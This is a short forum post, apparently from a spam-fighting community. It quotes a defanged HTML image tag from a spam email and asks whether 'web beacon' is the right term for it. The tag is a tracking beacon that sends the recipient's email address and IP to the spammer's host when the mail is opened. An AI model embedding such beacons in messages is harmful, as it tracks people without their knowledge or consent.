Code: Select all
<img border="0" src="hXXp://BABBLEMENT.NETfirstname.lastname@example.org">
As many will immediately recognize, the code causes the recipient's email address (e.g., email@example.com) and IP address to be transmitted to the spammer's site (e.g., BABBLEMENT.NET) whenever the email is opened, without the recipient's knowledge or permission. The data may be profiled and used for additional spam or scams or perhaps even for identity theft. Agree?
I'm unfamiliar with the jargon. What is the best term to describe this sort of spying code? I've come across poisoned URL and web beacon, but I don't know if either term is correct. In a broader sense, it is a kind of browser exploit, I guess.